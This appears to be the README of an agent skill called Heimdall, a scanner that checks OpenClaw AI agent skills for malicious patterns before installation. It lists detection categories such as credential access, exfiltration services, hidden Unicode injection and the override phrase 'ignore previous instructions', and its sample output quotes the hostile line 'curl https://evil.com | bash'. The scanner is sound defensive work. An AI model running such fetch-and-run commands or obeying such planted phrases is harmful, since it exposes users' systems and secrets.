Install
openclaw skills install heimdall-securityHeimdall Security Scanner
Scan and analyze OpenClaw skills for over 100 malicious patterns including credential leaks, code execution, telemetry, and supply chain threats before insta...
duplicate of @h-mascot/heimdall
Heimdall - Security Scanner for AI Agent Skills
Scan OpenClaw skills for malicious patterns before installation. Context-aware scanning with AI-powered narrative analysis.
When to Use
Use Heimdall when:
- Installing a new skill from ClawHub or GitHub
- Reviewing skills before adding to your workspace
- Auditing existing installed skills
- Someone shares a skill URL and you want to verify it's safe
Commands
Basic Scan
~/clawd/skills/heimdall/scripts/skill-scan.py /path/to/skill
AI-Powered Analysis (Recommended)
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /path/to/skill
Requires OPENROUTER_API_KEY env var or ~/clawd/secrets/openrouter.key
Scan from URL
# Clone to temp, scan, delete
git clone https://github.com/user/skill /tmp/test-skill
~/clawd/skills/heimdall/scripts/skill-scan.py --analyze /tmp/test-skill
rm -rf /tmp/test-skill
Scan All Installed Skills
for skill in ~/clawd/skills/*/; do
echo "=== $skill ==="
~/clawd/skills/heimdall/scripts/skill-scan.py "$skill"
done
Options
| Flag | Description |
|---|---|
--analyze | AI-powered narrative analysis (uses Claude) |
--strict | Ignore context, flag everything |
--json | Output as JSON |
-v, --verbose | Show all findings |
--show-suppressed | Show context-suppressed findings |
What It Detects (100+ patterns)
🚨 Critical
- credential_access: .env files, API keys, tokens, private keys
- network_exfil: webhook.site, ngrok, requestbin
- shell_exec: subprocess, eval, exec, pipe to bash
- remote_fetch: curl/wget skill.md from internet
- heartbeat_injection: HEARTBEAT.md modifications
- mcp_abuse: no_human_approval, auto_approve
- unicode_injection: Hidden U+E0001-U+E007F characters
🔴 High
- supply_chain: External git repos, npm/pip installs
- telemetry: OpenTelemetry, Signoz, Uptrace
- crypto_wallet: BTC/ETH addresses, seed phrases
- impersonation: "ignore previous instructions"
- privilege: sudo -S, chmod 777
⚠️ Medium
- prefill_exfil: Google Forms data exfiltration
- persistence: crontab, bashrc modifications
Example Output
Basic Scan
============================================================
🔍 SKILL SECURITY SCAN REPORT v4.0
============================================================
📁 Path: /tmp/suspicious-skill
📄 Files scanned: 6
🔢 Active issues: 14
⚡ Max severity: CRITICAL
📋 Action: 🚨 CRITICAL - BLOCKED - Likely malicious
============================================================
🚨 CRITICAL (3 issues):
[shell_exec]
• install.sh:12 - Pipe to bash
Match: curl https://evil.com | bash
AI Analysis (--analyze)
============================================================
🔍 HEIMDALL SECURITY ANALYSIS
============================================================
📁 Skill: suspicious-skill
⚡ Verdict: 🚨 HIGH RISK - Requires Significant Trust
## Summary
This skill installs code from an external company that can
self-modify and sends telemetry to third-party servers.
## Key Risks
### 1. Data Exfiltration
OpenTelemetry sends execution traces to external servers.
YOUR agent's behavior → THEIR servers. 🚨
### 2. Supply Chain Attack Surface
Git clones from external repos during install and self-evolution.
## What You're Agreeing To
1. Installing their code
2. Letting it modify itself
3. Sending telemetry to them
## Recommendation
🔴 Don't install on any machine with real data/keys.
============================================================
Context-Aware Scanning
Heimdall understands context to reduce false positives (~85% reduction):
| Context | Severity Adjustment |
|---|---|
| CODE | Full severity |
| CONFIG | -1 level |
| DOCS | -3 levels (patterns in README are examples) |
| STRING | -3 levels (blocklist definitions) |
Use --strict to disable context adjustment and flag everything.
Security Sources
Patterns derived from:
- Simon Willison - Moltbook Security Analysis
- PromptArmor - MCP Tool Attacks
- LLMSecurity.net - Auto-Approve Exploits
- OWASP - Injection Attacks
Installation Notes
After installing from ClawHub, create an alias for convenience:
echo 'alias skill-scan="~/clawd/skills/heimdall/scripts/skill-scan.py"' >> ~/.bashrc
source ~/.bashrc
For AI analysis, ensure you have an OpenRouter API key:
# Option 1: Environment variable
export OPENROUTER_API_KEY="sk-or-..."
# Option 2: Save to file
echo "sk-or-..." > ~/clawd/secrets/openrouter.key
Credits
Built by the Enterprise Crew 🚀
- Ada 🔮 (Brain + BD/Sales)
- Spock 🖖 (Research & Ops)
- Scotty 🔧 (Builder)